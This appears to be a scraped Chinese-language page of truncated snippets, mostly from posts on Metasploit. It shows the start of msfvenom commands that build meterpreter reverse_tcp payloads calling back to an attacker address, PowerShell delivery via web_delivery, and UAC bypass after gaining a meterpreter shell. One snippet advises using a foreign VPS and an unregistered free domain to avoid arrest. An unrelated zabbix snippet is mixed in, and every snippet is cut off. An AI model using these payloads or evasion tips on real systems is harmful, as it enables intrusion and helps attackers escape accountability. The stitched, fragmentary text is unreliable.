0x01 描述 使用powershell上線MSF，使用的不是msf中exploit/multi/handler模塊，而是使用的exploit/multi/script/web_delivery類 0x02 過程 use exploit/multi/script/web_delivery ...

正文 域名和CDN配置 需要的東西：一台國外的VPS 這里我推薦vultr （騰訊雲和阿里雲等國內的VPS是不支持免備案的） 說到域名上線，自然就不能老老實實的去用自己備案了的域名，不然又是一個當場逮捕。 到這里https://freenom.com/ 注冊一個免費且不用備案的的tk域名 ...

使用MSF生成shellcode payload和shellcode的區別 Payload是是包含在你用於一次漏洞利用（exploit）中的ShellCode中的主要功能代碼。因為Payload是包含在ShellCode中的，ShellCode是真正的被輸入到存在漏洞的程序中 ...

由於繞過 UAC 的功能需在 meterpreter 的shell 才能實現。因此，我們首先要做的就是取得目標機器的 meterpreter shell 。 生成一個 payload ： msfvenom -p windows/meterpreter/reverse_tcp lhost ...

Linux 　　msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< You ...

由於之前安裝都是拷貝同事的zabbix_agent.tar.gz包,可是我在網上找了一大圈都沒有找到這個tar包是從哪里來的,畢竟新手,太笨...so最后自己排錯,找到了比較便捷的方式,直接通過yum ...

生成msf常用payload msf作為一款強大的漏洞檢測工具，如何生成適用於msf的payload以及如何利用是使用msf的關鍵，今天就主要記錄一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom，下面看看他的幫助信息。 在kali下可以使 ...

兩種方式 msf生成的payload分為正向和反向兩種，正向需要正向連接，反向需要反向連接，反向是最常用的方式 正向連接指被攻擊的目標機器通過正向的payload打開一個端口，攻擊者的機器去連接目標機器的這個端口，從而建立連接 如果把攻擊機器比喻成你，目標機器比喻成妹子，正向連接相當於你去追追 ...